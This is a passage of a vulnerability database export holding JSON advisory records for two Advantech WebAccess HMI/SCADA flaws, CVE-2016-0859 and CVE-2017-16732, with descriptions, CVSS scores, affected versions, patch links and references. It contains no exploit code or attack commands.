[ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-528", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-528", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-528", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaURL Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-528" } ], "trust": 0.7 } }
var-201601-0041
Vulnerability from variot
Integer overflow in the Kernel service in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted RPC request. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x791E IOCTL in the Kernel subsystem. An integer overflow for alloc size vulnerability exists. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" }, { "db": "NVD", "id": "CVE-2016-0859" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001289" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-104" } ], "trust": 0.7 }, "cve": "CVE-2016-0859", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0859", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0859", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00437", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-88369", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0859", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0859", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2016-0859", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2016-0859", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2016-00437", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-332", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-88369", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "VULHUB", "id": "VHN-88369" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" }, { "db": "NVD", "id": "CVE-2016-0859" } ] }, "description": { "_id": null, "data": "Integer overflow in the Kernel service in Advantech WebAccess before 8.1 allows remote attackers to execute arbitrary code or cause a denial of service (stack-based buffer overflow) via a crafted RPC request. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x791E IOCTL in the Kernel subsystem. An integer overflow for alloc size vulnerability exists. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0859" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88369" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-0859", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 3.4 }, { "db": "ZDI", "id": "ZDI-16-104", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201601-332", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00437", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001289", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3197", "trust": 0.7 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64D2D7A8-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-88369", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "VULHUB", "id": "VHN-88369" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" }, { "db": "NVD", "id": "CVE-2016-0859" } ] }, "id": "VAR-201601-0041", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "VULHUB", "id": "VHN-88369" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00437" } ] }, "last_update_date": "2024-11-23T21:43:22.945000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" }, { "title": "Patch for Advantech WebAccess Integer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70381" }, { "title": "Advantech WebAccess Kernel Fixes for serving integer overflow vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59650" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-189", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88369" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "NVD", "id": "CVE-2016-0859" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0859" }, { "trust": 1.1, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-104" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0859" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-104" }, { "db": "CNVD", "id": "CNVD-2016-00437" }, { "db": "VULHUB", "id": "VHN-88369" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" }, { "db": "NVD", "id": "CVE-2016-0859" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d", "ident": null }, { "db": "ZDI", "id": "ZDI-16-104", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-00437", "ident": null }, { "db": "VULHUB", "id": "VHN-88369", "ident": null }, { "db": "BID", "id": "80745", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2016-001289", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201601-332", "ident": null }, { "db": "NVD", "id": "CVE-2016-0859", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64d2d7a8-2351-11e6-abef-000c29c66e3d", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-104", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00437", "ident": null }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-88369", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001289", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-332", "ident": null }, { "date": "2016-01-15T03:59:21.030000", "db": "NVD", "id": "CVE-2016-0859", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-104", "ident": null }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00437", "ident": null }, { "date": "2016-12-03T00:00:00", "db": "VULHUB", "id": "VHN-88369", "ident": null }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745", "ident": null }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001289", "ident": null }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-332", "ident": null }, { "date": "2024-11-21T02:42:31.400000", "db": "NVD", "id": "CVE-2016-0859", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-332" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Kernel service integer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001289" }, { "db": "CNNVD", "id": "CNNVD-201601-332" } ], "trust": 1.4 }, "type": { "_id": null, "data": "digital error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-332" } ], "trust": 0.6 } }
var-201801-0154
Vulnerability from variot
A use-after-free issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows an unauthenticated attacker to specify an arbitrary address. Advantech WebAccess Contains a vulnerability in the use of freed memory.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0154", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 2.4, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-001407" } ] }, "cve": "CVE-2017-16732", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-16732", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2018-02541", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-107684", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-16732", "impactScore": 2.5, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-16732", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2017-16732", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-02541", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201801-561", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-107684", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "VULHUB", "id": "VHN-107684" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A use-after-free issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows an unauthenticated attacker to specify an arbitrary address. Advantech WebAccess Contains a vulnerability in the use of freed memory.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. This vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products", "sources": [ { "db": "NVD", "id": "CVE-2017-16732" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-107684" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-16732", "trust": 3.3 }, { "db": "ICS CERT", "id": "ICSA-18-004-02A", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201801-561", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-02541", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-001407", "trust": 0.8 }, { "db": "IVD", "id": "E2E32A83-39AB-11E9-9D1B-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-107684", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "VULHUB", "id": "VHN-107684" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "id": "VAR-201801-0154", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "VULHUB", "id": "VHN-107684" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" } ] }, "last_update_date": "2024-11-23T22:22:16.058000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Information Disclosure Vulnerability (CNVD-2018-02541)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/115335" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77763" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-416", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-107684" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-004-02a" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16732" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16732" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "VULHUB", "id": "VHN-107684" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-02541" }, { "db": "VULHUB", "id": "VHN-107684" }, { "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "db": "CNNVD", "id": "CNNVD-201801-561" }, { "db": "NVD", "id": "CVE-2017-16732" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-02-01T00:00:00", "db": "IVD", "id": "e2e32a83-39ab-11e9-9d1b-000c29342cb1" }, { "date": "2018-02-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-02541" }, { "date": "2018-01-12T00:00:00", "db": "VULHUB", "id": "VHN-107684" }, { "date": "2018-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "date": "2018-01-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-561" }, { "date": "2018-01-12T02:29:02.007000", "db": "NVD", "id": "CVE-2017-16732" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-02-01T00:00:00", "db": "CNVD", "id": "CNVD-2018-02541" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-107684" }, { "date": "2018-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-001407" }, { "date": "2020-07-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201801-561" }, { "date": "2024-11-21T03:16:52.247000", "db": "NVD", "id": "CVE-2017-16732" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201801-561" } ], "trust": 0.6 }, 